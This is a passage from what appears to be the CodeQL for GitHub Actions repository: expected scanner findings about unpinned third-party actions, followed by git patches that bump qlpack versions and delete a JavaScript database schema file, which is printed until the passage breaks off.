fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit 
hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | 
From 44fd14caaf023b055518ce7d1f11ce55db98d957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 9 Nov 2024 10:40:04 +0100 Subject: [PATCH 0695/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a7df1c400bf..b72f94d1bb1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.85 +version: 0.2.0 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 96ba9840785..a9f045567b0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.85 +version: 0.2.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From be8a49228f3de26952beece271a747bcbb62778c Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 13 Nov 2024 13:42:57 -0500 Subject: [PATCH 0696/1267] Delete dbscheme Update after merge --- ql/lib/ext/config/immutable_actions.yml | 2 +- ql/lib/semmlecode.javascript.dbscheme | 1190 - ql/lib/semmlecode.javascript.dbscheme.stats | 28248 ---------------- ql/test/codeql-pack.lock.yml | 22 +- .../UnnecessaryUseOfAdvancedConfig.actual | 1 - 5 files changed, 17 insertions(+), 29446 deletions(-) delete mode 100644 ql/lib/semmlecode.javascript.dbscheme delete mode 100644 ql/lib/semmlecode.javascript.dbscheme.stats delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml index 072e8ed0b09..d6a9b1020d7 100644 --- a/ql/lib/ext/config/immutable_actions.yml +++ b/ql/lib/ext/config/immutable_actions.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: immutableActionsDataModel data: - ["actions/checkout"] diff --git a/ql/lib/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme deleted file mode 100644 index c88c69174bd..00000000000 --- a/ql/lib/semmlecode.javascript.dbscheme +++ /dev/null 
@@ -1,1190 +0,0 @@ -/*** Standard fragments ***/ - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Lines of code -*/ - -numlines( - int element_id: @sourceline ref, - int num_lines: int ref, - int num_code: int ref, - int num_comment: int ref -); - -/*- External data -*/ - -/** - * External data, loaded from CSV files during snapshot creation. See - * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) - * for more information. - */ -externalData( - int id : @externalDataElement, - string path : string ref, - int column: int ref, - string value : string ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. 
- */ -sourceLocationPrefix(string prefix : string ref); - -/*- JavaScript-specific part -*/ - -@location = @location_default - -@sourceline = @locatable; - -filetype( - int file: @file ref, - string filetype: string ref -) - -// top-level code fragments -toplevels (unique int id: @toplevel, - int kind: int ref); - -is_externs (int toplevel: @toplevel ref); - -case @toplevel.kind of - 0 = @script -| 1 = @inline_script -| 2 = @event_handler -| 3 = @javascript_url -| 4 = @template_toplevel; - -is_module (int tl: @toplevel ref); -is_nodejs (int tl: @toplevel ref); -is_es2015_module (int tl: @toplevel ref); -is_closure_module (int tl: @toplevel ref); - -@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; -toplevel_parent_xml_node( - unique int toplevel: @toplevel ref, - int xmlnode: @xml_node_with_code ref); - -xml_element_parent_expression( - unique int xmlnode: @xmlelement ref, - int expression: @expr ref, - int index: int ref); - -// statements -#keyset[parent, idx] -stmts (unique int id: @stmt, - int kind: int ref, - int parent: @stmt_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -stmt_containers (unique int stmt: @stmt ref, - int container: @stmt_container ref); - -jump_targets (unique int jump: @stmt ref, - int target: @stmt ref); - -@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; -@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; - -case @stmt.kind of - 0 = @empty_stmt -| 1 = @block_stmt -| 2 = @expr_stmt -| 3 = @if_stmt -| 4 = @labeled_stmt -| 5 = @break_stmt -| 6 = @continue_stmt -| 7 = @with_stmt -| 8 = @switch_stmt -| 9 = @return_stmt -| 10 = @throw_stmt -| 11 = @try_stmt -| 12 = @while_stmt -| 13 = @do_while_stmt -| 14 = @for_stmt -| 15 = @for_in_stmt -| 16 = @debugger_stmt -| 17 = @function_decl_stmt -| 18 = @var_decl_stmt -| 19 = @case -| 20 = @catch_clause -| 21 = 
@for_of_stmt -| 22 = @const_decl_stmt -| 23 = @let_stmt -| 24 = @legacy_let_stmt -| 25 = @for_each_stmt -| 26 = @class_decl_stmt -| 27 = @import_declaration -| 28 = @export_all_declaration -| 29 = @export_default_declaration -| 30 = @export_named_declaration -| 31 = @namespace_declaration -| 32 = @import_equals_declaration -| 33 = @export_assign_declaration -| 34 = @interface_declaration -| 35 = @type_alias_declaration -| 36 = @enum_declaration -| 37 = @external_module_declaration -| 38 = @export_as_namespace_declaration -| 39 = @global_augmentation_declaration -| 40 = @using_decl_stmt -; - -@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; - -@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; - -@namespace_definition = @namespace_declaration | @enum_declaration; -@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; - -is_instantiated(unique int decl: @namespace_declaration ref); - -@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; -has_declare_keyword(unique int stmt: @declarable_node ref); - -is_for_await_of(unique int forof: @for_of_stmt ref); - -// expressions -#keyset[parent, idx] -exprs (unique int id: @expr, - int kind: int ref, - int parent: @expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @expr_or_type ref); - -enclosing_stmt (unique int expr: @expr_or_type ref, - int stmt: @stmt ref); - -expr_containers (unique int expr: @expr_or_type ref, - int container: @stmt_container ref); - -array_size (unique int ae: @arraylike ref, - int sz: int ref); - -is_delegating (int yield: @yield_expr ref); - -@expr_or_stmt = @expr | @stmt; 
-@expr_or_type = @expr | @typeexpr; -@expr_parent = @expr_or_stmt | @property | @function_typeexpr; -@arraylike = @array_expr | @array_pattern; -@type_annotation = @typeexpr | @jsdoc_type_expr; -@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; - -case @expr.kind of - 0 = @label -| 1 = @null_literal -| 2 = @boolean_literal -| 3 = @number_literal -| 4 = @string_literal -| 5 = @regexp_literal -| 6 = @this_expr -| 7 = @array_expr -| 8 = @obj_expr -| 9 = @function_expr -| 10 = @seq_expr -| 11 = @conditional_expr -| 12 = @new_expr -| 13 = @call_expr -| 14 = @dot_expr -| 15 = @index_expr -| 16 = @neg_expr -| 17 = @plus_expr -| 18 = @log_not_expr -| 19 = @bit_not_expr -| 20 = @typeof_expr -| 21 = @void_expr -| 22 = @delete_expr -| 23 = @eq_expr -| 24 = @neq_expr -| 25 = @eqq_expr -| 26 = @neqq_expr -| 27 = @lt_expr -| 28 = @le_expr -| 29 = @gt_expr -| 30 = @ge_expr -| 31 = @lshift_expr -| 32 = @rshift_expr -| 33 = @urshift_expr -| 34 = @add_expr -| 35 = @sub_expr -| 36 = @mul_expr -| 37 = @div_expr -| 38 = @mod_expr -| 39 = @bitor_expr -| 40 = @xor_expr -| 41 = @bitand_expr -| 42 = @in_expr -| 43 = @instanceof_expr -| 44 = @logand_expr -| 45 = @logor_expr -| 47 = @assign_expr -| 48 = @assign_add_expr -| 49 = @assign_sub_expr -| 50 = @assign_mul_expr -| 51 = @assign_div_expr -| 52 = @assign_mod_expr -| 53 = @assign_lshift_expr -| 54 = @assign_rshift_expr -| 55 = @assign_urshift_expr -| 56 = @assign_or_expr -| 57 = @assign_xor_expr -| 58 = @assign_and_expr -| 59 = @preinc_expr -| 60 = @postinc_expr -| 61 = @predec_expr -| 62 = @postdec_expr -| 63 = @par_expr -| 64 = @var_declarator -| 65 = @arrow_function_expr -| 66 = @spread_element -| 67 = @array_pattern -| 68 = @object_pattern -| 69 = @yield_expr -| 70 = @tagged_template_expr -| 71 = @template_literal -| 72 = @template_element -| 73 = @array_comprehension_expr -| 74 = @generator_expr -| 75 = @for_in_comprehension_block -| 76 = @for_of_comprehension_block -| 77 = @legacy_letexpr -| 78 = @var_decl -| 79 = 
@proper_varaccess -| 80 = @class_expr -| 81 = @super_expr -| 82 = @newtarget_expr -| 83 = @named_import_specifier -| 84 = @import_default_specifier -| 85 = @import_namespace_specifier -| 86 = @named_export_specifier -| 87 = @exp_expr -| 88 = @assign_exp_expr -| 89 = @jsx_element -| 90 = @jsx_qualified_name -| 91 = @jsx_empty_expr -| 92 = @await_expr -| 93 = @function_sent_expr -| 94 = @decorator -| 95 = @export_default_specifier -| 96 = @export_namespace_specifier -| 97 = @bind_expr -| 98 = @external_module_reference -| 99 = @dynamic_import -| 100 = @expression_with_type_arguments -| 101 = @prefix_type_assertion -| 102 = @as_type_assertion -| 103 = @export_varaccess -| 104 = @decorator_list -| 105 = @non_null_assertion -| 106 = @bigint_literal -| 107 = @nullishcoalescing_expr -| 108 = @e4x_xml_anyname -| 109 = @e4x_xml_static_attribute_selector -| 110 = @e4x_xml_dynamic_attribute_selector -| 111 = @e4x_xml_filter_expression -| 112 = @e4x_xml_static_qualident -| 113 = @e4x_xml_dynamic_qualident -| 114 = @e4x_xml_dotdotexpr -| 115 = @import_meta_expr -| 116 = @assignlogandexpr -| 117 = @assignlogorexpr -| 118 = @assignnullishcoalescingexpr -| 119 = @template_pipe_ref -| 120 = @generated_code_expr -| 121 = @satisfies_expr -; - -@varaccess = @proper_varaccess | @export_varaccess; -@varref = @var_decl | @varaccess; - -@identifier = @label | @varref | @type_identifier; - -@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; - -@propaccess = @dot_expr | @index_expr; - -@invokeexpr = @new_expr | @call_expr; - -@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; - -@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; - -@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; - -@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | 
@mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; - -@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; - -@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; - -@pattern = @varref | @array_pattern | @object_pattern; - -@comprehension_expr = @array_comprehension_expr | @generator_expr; - -@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; - -@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; - -@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; - -@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; - -@type_assertion = @as_type_assertion | @prefix_type_assertion; - -@class_definition = @class_decl_stmt | @class_expr; -@interface_definition = @interface_declaration | @interface_typeexpr; -@class_or_interface = @class_definition | @interface_definition; - -@lexical_decl = @var_decl | @type_decl; -@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; -@lexical_ref = @lexical_decl | @lexical_access; - -@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; -@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; - -expr_contains_template_tag_location( - int expr: @expr ref, - int location: @location ref -); - -@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; - -template_placeholder_tag_info( - unique int node: @template_placeholder_tag, - int parentNode: 
@template_placeholder_tag_parent ref, - varchar(900) raw: string ref -); - -// scopes -scopes (unique int id: @scope, - int kind: int ref); - -case @scope.kind of - 0 = @global_scope -| 1 = @function_scope -| 2 = @catch_scope -| 3 = @module_scope -| 4 = @block_scope -| 5 = @for_scope -| 6 = @for_in_scope // for-of scopes work the same as for-in scopes -| 7 = @comprehension_block_scope -| 8 = @class_expr_scope -| 9 = @namespace_scope -| 10 = @class_decl_scope -| 11 = @interface_scope -| 12 = @type_alias_scope -| 13 = @mapped_type_scope -| 14 = @enum_scope -| 15 = @external_module_scope -| 16 = @conditional_type_scope; - -scopenodes (unique int node: @ast_node ref, - int scope: @scope ref); - -scopenesting (unique int inner: @scope ref, - int outer: @scope ref); - -// functions -@function = @function_decl_stmt | @function_expr | @arrow_function_expr; - -@parameterized = @function | @catch_clause; -@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; - -is_generator (int fun: @function ref); -has_rest_parameter (int fun: @function ref); -is_async (int fun: @function ref); - -// variables and lexically scoped type names -#keyset[scope, name] -variables (unique int id: @variable, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_type_names (unique int id: @local_type_name, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_namespace_names (unique int id: @local_namespace_name, - varchar(900) name: string ref, - int scope: @scope ref); - -is_arguments_object (int id: @variable ref); - -@lexical_name = @variable | @local_type_name | @local_namespace_name; - -@bind_id = @varaccess | @local_var_type_access; -bind (unique int id: @bind_id ref, - int decl: @variable ref); - -decl (unique int id: @var_decl ref, - int decl: @variable ref); - -@typebind_id = @local_type_access | @export_varaccess; -typebind (unique int id: @typebind_id 
ref, - int decl: @local_type_name ref); - -@typedecl_id = @type_decl | @var_decl; -typedecl (unique int id: @typedecl_id ref, - int decl: @local_type_name ref); - -namespacedecl (unique int id: @var_decl ref, - int decl: @local_namespace_name ref); - -@namespacebind_id = @local_namespace_access | @export_varaccess; -namespacebind (unique int id: @namespacebind_id ref, - int decl: @local_namespace_name ref); - - -// properties in object literals, property patterns in object patterns, and method declarations in classes -#keyset[parent, index] -properties (unique int id: @property, - int parent: @property_parent ref, - int index: int ref, - int kind: int ref, - varchar(900) tostring: string ref); - -case @property.kind of - 0 = @value_property -| 1 = @property_getter -| 2 = @property_setter -| 3 = @jsx_attribute -| 4 = @function_call_signature -| 5 = @constructor_call_signature -| 6 = @index_signature -| 7 = @enum_member -| 8 = @proper_field -| 9 = @parameter_field -| 10 = @static_initializer -; - -@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; -@property_accessor = @property_getter | @property_setter; -@call_signature = @function_call_signature | @constructor_call_signature; -@field = @proper_field | @parameter_field; -@field_or_vardeclarator = @field | @var_declarator; - -is_computed (int id: @property ref); -is_method (int id: @property ref); -is_static (int id: @property ref); -is_abstract_member (int id: @property ref); -is_const_enum (int id: @enum_declaration ref); -is_abstract_class (int id: @class_decl_stmt ref); - -has_public_keyword (int id: @property ref); -has_private_keyword (int id: @property ref); -has_protected_keyword (int id: @property ref); -has_readonly_keyword (int id: @property ref); -has_type_keyword (int id: @type_keyword_operand ref); -is_optional_member (int id: @property ref); -has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); 
-is_optional_parameter_declaration (unique int parameter: @pattern ref); - -#keyset[constructor, param_index] -parameter_fields( - unique int field: @parameter_field ref, - int constructor: @function_expr ref, - int param_index: int ref -); - -// types -#keyset[parent, idx] -typeexprs ( - unique int id: @typeexpr, - int kind: int ref, - int parent: @typeexpr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref -); - -case @typeexpr.kind of - 0 = @local_type_access -| 1 = @type_decl -| 2 = @keyword_typeexpr -| 3 = @string_literal_typeexpr -| 4 = @number_literal_typeexpr -| 5 = @boolean_literal_typeexpr -| 6 = @array_typeexpr -| 7 = @union_typeexpr -| 8 = @indexed_access_typeexpr -| 9 = @intersection_typeexpr -| 10 = @parenthesized_typeexpr -| 11 = @tuple_typeexpr -| 12 = @keyof_typeexpr -| 13 = @qualified_type_access -| 14 = @generic_typeexpr -| 15 = @type_label -| 16 = @typeof_typeexpr -| 17 = @local_var_type_access -| 18 = @qualified_var_type_access -| 19 = @this_var_type_access -| 20 = @predicate_typeexpr -| 21 = @interface_typeexpr -| 22 = @type_parameter -| 23 = @plain_function_typeexpr -| 24 = @constructor_typeexpr -| 25 = @local_namespace_access -| 26 = @qualified_namespace_access -| 27 = @mapped_typeexpr -| 28 = @conditional_typeexpr -| 29 = @infer_typeexpr -| 30 = @import_type_access -| 31 = @import_namespace_access -| 32 = @import_var_type_access -| 33 = @optional_typeexpr -| 34 = @rest_typeexpr -| 35 = @bigint_literal_typeexpr -| 36 = @readonly_typeexpr -| 37 = @template_literal_typeexpr -; - -@typeref = @typeaccess | @type_decl; -@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; -@typeexpr_parent = @expr | @stmt | @property | @typeexpr; -@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; -@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; -@vartypeaccess = 
@local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; -@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; -@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; - -@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; - -// types -types ( - unique int id: @type, - int kind: int ref, - varchar(900) tostring: string ref -); - -#keyset[parent, idx] -type_child ( - int child: @type ref, - int parent: @type ref, - int idx: int ref -); - -case @type.kind of - 0 = @any_type -| 1 = @string_type -| 2 = @number_type -| 3 = @union_type -| 4 = @true_type -| 5 = @false_type -| 6 = @type_reference -| 7 = @object_type -| 8 = @canonical_type_variable_type -| 9 = @typeof_type -| 10 = @void_type -| 11 = @undefined_type -| 12 = @null_type -| 13 = @never_type -| 14 = @plain_symbol_type -| 15 = @unique_symbol_type -| 16 = @objectkeyword_type -| 17 = @intersection_type -| 18 = @tuple_type -| 19 = @lexical_type_variable_type -| 20 = @this_type -| 21 = @number_literal_type -| 22 = @string_literal_type -| 23 = @unknown_type -| 24 = @bigint_type -| 25 = @bigint_literal_type -; - -@boolean_literal_type = @true_type | @false_type; -@symbol_type = @plain_symbol_type | @unique_symbol_type; -@union_or_intersection_type = @union_type | @intersection_type; -@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; - -has_asserts_keyword(int node: @predicate_typeexpr ref); - -@typed_ast_node = @expr | @typeexpr | @function; -ast_node_type( - unique int node: @typed_ast_node ref, - int typ: @type ref); - -declared_function_signature( - unique int node: @function ref, - int sig: @signature_type ref -); - -invoke_expr_signature( - unique int node: @invokeexpr ref, - int sig: @signature_type ref -); - -invoke_expr_overload_index( - unique int node: @invokeexpr ref, - int index: int ref -); - -symbols ( - unique int id: 
@symbol, - int kind: int ref, - varchar(900) name: string ref -); - -symbol_parent ( - unique int symbol: @symbol ref, - int parent: @symbol ref -); - -symbol_module ( - int symbol: @symbol ref, - varchar(900) moduleName: string ref -); - -symbol_global ( - int symbol: @symbol ref, - varchar(900) globalName: string ref -); - -case @symbol.kind of - 0 = @root_symbol -| 1 = @member_symbol -| 2 = @other_symbol -; - -@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; -@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; - -ast_node_symbol( - unique int node: @ast_node_with_symbol ref, - int symbol: @symbol ref); - -type_symbol( - unique int typ: @type_with_symbol ref, - int symbol: @symbol ref); - -#keyset[typ, name] -type_property( - int typ: @type ref, - varchar(900) name: string ref, - int propertyType: @type ref); - -type_alias( - unique int aliasType: @type ref, - int underlyingType: @type ref); - -@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; -@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; -type_literal_value( - unique int typ: @type_with_literal_value ref, - varchar(900) value: string ref); - -signature_types ( - unique int id: @signature_type, - int kind: int ref, - varchar(900) tostring: string ref, - int type_parameters: int ref, - int required_params: int ref -); - -is_abstract_signature( - unique int sig: @signature_type ref -); - -signature_rest_parameter( - unique int sig: @signature_type ref, - int rest_param_arra_type: @type ref -); - -case @signature_type.kind of - 0 = @function_signature_type -| 1 = @constructor_signature_type -; - -#keyset[typ, kind, index] -type_contains_signature ( - int typ: @type ref, - int kind: int 
ref, // constructor/call/index - int index: int ref, // ordering of overloaded signatures - int sig: @signature_type ref -); - -#keyset[parent, index] -signature_contains_type ( - int child: @type ref, - int parent: @signature_type ref, - int index: int ref -); - -#keyset[sig, index] -signature_parameter_name ( - int sig: @signature_type ref, - int index: int ref, - varchar(900) name: string ref -); - -number_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -string_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -base_type_names( - int typeName: @symbol ref, - int baseTypeName: @symbol ref -); - -self_types( - int typeName: @symbol ref, - int selfType: @type_reference ref -); - -tuple_type_min_length( - unique int typ: @type ref, - int minLength: int ref -); - -tuple_type_rest_index( - unique int typ: @type ref, - int index: int ref -); - -// comments -comments (unique int id: @comment, - int kind: int ref, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(900) tostring: string ref); - -case @comment.kind of - 0 = @slashslash_comment -| 1 = @slashstar_comment -| 2 = @doc_comment -| 3 = @html_comment_start -| 4 = @htmlcommentend; - -@html_comment = @html_comment_start | @htmlcommentend; -@line_comment = @slashslash_comment | @html_comment; -@block_comment = @slashstar_comment | @doc_comment; - -// source lines -lines (unique int id: @line, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(2) terminator: string ref); -indentation (int file: @file ref, - int lineno: int ref, - varchar(1) indentChar: string ref, - int indentDepth: int ref); - -// JavaScript parse errors -js_parse_errors (unique int id: @js_parse_error, - int toplevel: @toplevel ref, - varchar(900) message: string ref, - varchar(900) line: string ref); - -// regular expressions -#keyset[parent, idx] -regexpterm (unique int id: @regexpterm, - int kind: int ref, - int parent: @regexpparent 
ref, - int idx: int ref, - varchar(900) tostring: string ref); - -@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; - -case @regexpterm.kind of - 0 = @regexp_alt -| 1 = @regexp_seq -| 2 = @regexp_caret -| 3 = @regexp_dollar -| 4 = @regexp_wordboundary -| 5 = @regexp_nonwordboundary -| 6 = @regexp_positive_lookahead -| 7 = @regexp_negative_lookahead -| 8 = @regexp_star -| 9 = @regexp_plus -| 10 = @regexp_opt -| 11 = @regexp_range -| 12 = @regexp_dot -| 13 = @regexp_group -| 14 = @regexp_normal_constant -| 15 = @regexp_hex_escape -| 16 = @regexp_unicode_escape -| 17 = @regexp_dec_escape -| 18 = @regexp_oct_escape -| 19 = @regexp_ctrl_escape -| 20 = @regexp_char_class_escape -| 21 = @regexp_id_escape -| 22 = @regexp_backref -| 23 = @regexp_char_class -| 24 = @regexp_char_range -| 25 = @regexp_positive_lookbehind -| 26 = @regexp_negative_lookbehind -| 27 = @regexp_unicode_property_escape; - -regexp_parse_errors (unique int id: @regexp_parse_error, - int regexp: @regexpterm ref, - varchar(900) message: string ref); - -@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; -@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; -@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; -@regexp_constant = @regexp_normal_constant | @regexp_char_escape; -@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; -@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; -@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; -@regexp_anchor = @regexp_dollar | @regexp_caret; - -is_greedy (int id: @regexp_quantifier ref); -range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); -range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); -is_capture (unique int id: @regexp_group ref, int number: 
int ref); -is_named_capture (unique int id: @regexp_group ref, string name: string ref); -is_inverted (int id: @regexp_char_class ref); -regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); -char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); -backref (unique int id: @regexp_backref ref, int value: int ref); -named_backref (unique int id: @regexp_backref ref, string name: string ref); -unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); -unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); - -// tokens -#keyset[toplevel, idx] -tokeninfo (unique int id: @token, - int kind: int ref, - int toplevel: @toplevel ref, - int idx: int ref, - varchar(900) value: string ref); - -case @token.kind of - 0 = @token_eof -| 1 = @token_null_literal -| 2 = @token_boolean_literal -| 3 = @token_numeric_literal -| 4 = @token_string_literal -| 5 = @token_regular_expression -| 6 = @token_identifier -| 7 = @token_keyword -| 8 = @token_punctuator; - -// associate comments with the token immediately following them (which may be EOF) -next_token (int comment: @comment ref, int token: @token ref); - -// JSON -#keyset[parent, idx] -json (unique int id: @json_value, - int kind: int ref, - int parent: @json_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -json_literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @json_value ref); - -json_properties (int obj: @json_object ref, - varchar(900) property: string ref, - int value: @json_value ref); - -json_errors (unique int id: @json_parse_error, - varchar(900) message: string ref); - -json_locations(unique int locatable: @json_locatable ref, - int location: @location_default ref); - -case @json_value.kind of - 0 = @json_null -| 1 = @json_boolean -| 2 = @json_number -| 3 = @json_string -| 4 = 
